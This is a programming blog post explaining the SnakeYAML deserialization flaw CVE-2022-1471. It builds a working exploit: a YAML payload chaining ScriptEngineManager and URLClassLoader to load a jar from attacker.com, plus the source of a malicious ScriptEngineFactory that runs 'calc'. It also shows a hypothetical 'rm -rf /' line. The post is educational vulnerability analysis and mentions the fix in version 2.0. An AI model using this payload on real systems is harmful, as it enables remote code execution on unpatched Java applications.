mscharhag, Programming and Stuff;

A blog about programming and software development topics, mostly focused on Java technologies including Java EE, Spring and Grails.

Tuesday, 6 June, 2023

Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)

In this post we will take a closer look at SnakeYAML and CVE-2022-1471.

SnakeYAML is a popular Java library for parsing YAML files. For example, Spring Boot uses SnakeYAML to parse YAML configuration files.

In late 2022, a critical vulnerability was discovered in SnakeYAML (referred to as CVE-2022-1471). This allowed an attacker to perform remote code execution by providing a malicious YAML file. The problem was fixed in SnakeYAML 2.0, released in February 2023.

I recently looked into this vulnerability and learned a few things that I'll try to break down in this post.

Parsing YAML files with SnakeYAML

Before we look at the actual security issue, let us take a quick look at how SnakeYAML is actually used in a Java application.

Suppose we have the following YAML file named person.yml:

person:
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town

In our Java code we can parse this YAML file with SnakeYAML like this:

Yaml yaml = new Yaml();
FileInputStream fis = new FileInputStream("/path/to/person.yml");
Map<String, Object> parsed = yaml.load(fis);

Map<String, Object> person = (Map<String, Object>) parsed.get("person");
person.get("firstname");  // "john"
person.get("lastname");   // "doe"
person.get("address");    // another map with keys "street" and "city"

yaml.load(fis) returns a Map<String, Object> instance that we can navigate through to get the values defined in the YAML file.

Mapping YAML content to objects

Unfortunately, working with maps is usually not very pleasant. So SnakeYAML provides several ways to map YAML content to Java objects.

One way is to use the !! syntax to set a Java type within a YAML object:

person:
  !!demo.Person
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town

This tells SnakeYAML to map the contents of the person object to the demo.Person Java class, which looks like this:

public class Person {
    private String firstname;
    private String lastname;
    private Address address; // has getter and setter for street and city

    // getter and setter
}

We can now parse the YAML file and get the person object with the mapped YAML values like this:

Map<String, Object> parsed = yaml.load(fis);
Person person = (Person) parsed.get("person");

SnakeYAML now creates a new Person object using the default constructor and uses setters to set the values defined in the YAML file. We can also instruct SnakeYAML to use constructor parameters instead of setters to set values.

For example, suppose we have the following simple Email value object:

public class Email {
    private String value;

    public Email(String value) {
        this.value = value;
    }

    // getter
}

Within the YAML file, we can tell SnakeYAML to create an Email object by enclosing the constructor argument in square brackets:

person:
  firstname: john
  lastname: doe
  email: !!demo.Email [ john@doe.com ]

Where is the security issue?

What we have seen so far is really all we need to run malicious code from a YAML file. SnakeYAML allows us to create classes, pass constructor parameters and call setters from a provided YAML file.

Assume for a moment that there is a RunSystemCommand class available in the class path. This class executes the system command passed in the constructor as soon as it is created. We could then provide the following YAML file:

foo: !!bad.code.RunSystemCommand [ rm -rf / ]

Which would run the rm -rf / system command right after it is instantiated by SnakeYAML.

Obviously this is a bit too simple, as such a class is unlikely to exist in the classpath. Also remember that we can only control constructors and setters through the YAML file. We cannot call arbitrary methods.

However, there are some interesting classes available in the standard Java library, that can be used. A very promising combination is ScriptEngineManager together with URLClassLoader. We will now learn a bit more about these two classes before we integrate them into a YAML file.

Loading remote code via URLClassLoader

URLClassLoader is a Java ClassLoader that can load classes and resources from jar files located at a specified URL. We can create URLClassLoader like this:

URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);

URLClassLoader takes an array of URLs as constructor parameter. Here we pass a single URL pointing to a jar file on a remote server controlled by the attacker. Our classLoader instance can now be used to load classes from the remote jar file.

If you are curious about how to load a class from a Classloader and use it via reflection, here is a simple example. However, this is not necessary for our SnakeYAML experiment.

// load class foo.bar.BadCode using the classLoader
Class<?> loadedClass = classLoader.loadClass("foo.bar.BadCode");

// create a new instance of foo.bar.BadCode using the default constructor
Object instance = loadedClass.newInstance();

// run the method runMaliciousCode() on our new instance
Method runMaliciousCode = loadedClass.getMethod("runMaliciousCode");
runMaliciousCode.invoke(instance);

Using ScriptEngineManager to run code for us

ScriptEngineManager is another standard Java library class. It implements a discovery and instantiation mechanism for Java script engine support. ScriptEngineManager uses the Java Service Provider mechanism to discover and instantiate available ScriptEngineFactory classes.

The ClassLoader used by ScriptEngineManager can be passed as a constructor parameter:

URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);

Here, the newly created ScriptEngineManager will look for ScriptEngineFactory implementations in our attacker-controlled remote jar. And more dangerously: It will instantiate eligible classes from that jar, giving the attacker the ability to run their own code.

But what content must be provided in the remote jar file?

We start by creating a malicious implementation of ScriptEngineFactory:

package foo.bar;

public class BadScriptEngineFactory implements ScriptEngineFactory {
    @Override
    public String getEngineName() {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return null;
    }

    // empty stubs for other interface methods
}

The first method that ScriptEngineManager calls after instantiating a ScriptEngineFactory is getEngineName(). So we use this method to execute our malicious code. In this example, we will simply run the calc system command, which will start the calculator on a Windows system. This is a simple proof, that we can run a system command from the provided jar file.

As mentioned earlier, ScriptEngineManager uses the Java Service Provider mechanism to find classes that implement the ScriptEngineFactory interface.

So we need to create a service provider configuration for our ScriptEngineFactory. We do this by creating a file called javax.script.ScriptEngineFactory in the META-INF/services directory. This file must contain the fully qualified name of our ScriptEngineFactory:

foo.bar.BadScriptEngineFactory

We then package the class and configuration file into a jar file called malicious-code.car. The final layout inside the jar file looks like this:

  • malicious-code.jar
    • META-INF
      • services
        • javax.script.ScriptEngineFactory
      • MANIFEST.MF
    • foo
      • bar
        • BadScriptEngineFactory.class

We can now put this jar file on a server and make it available to the URLClassLoader used by the ScriptEngineManager.

To recap the snippet shown earlier:

URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);

ScriptEngineManager should now detect the BadScriptEngineFactory class within the malicious-code.jar file. Once instantiated, it calls the getEngineName() method, which executes the calc system command. So running this code on a Windows system should open the Windows Calculator.

Constructing a malicious YAML file

Now we know enough to return to our original goal: constructing a malicious YAML file for SnakeYAML. As you may have noticed, the previous snippet only included constructor calls and the construction of an array. Both of these can be expressed within a YAML file.

So the final YAML file looks like this:

person: !!javax.script.ScriptEngineManager [
    !!java.net.URLClassLoader [[
        !!java.net.URL [http://attacker.com/malicious-code.jar]
    ]]
]

We create a simple person YAML object. For the value we use the !! syntax we saw earlier to create a ScriptEngineManager.

As a constructor parameter we pass a URLClassLoader with a URL pointing to our malicious jar file. Notice that we open two square brackets after URLClassLoader. One to indicate that a constructor argument follows and a second to define an array.

When this YAML file is parsed with a vulnerable version of SnakeYAML on a Windows system, the calculator opens. This proves that an attacker is able to run code and execute system commands by providing a malicious YAML file.

Leave a reply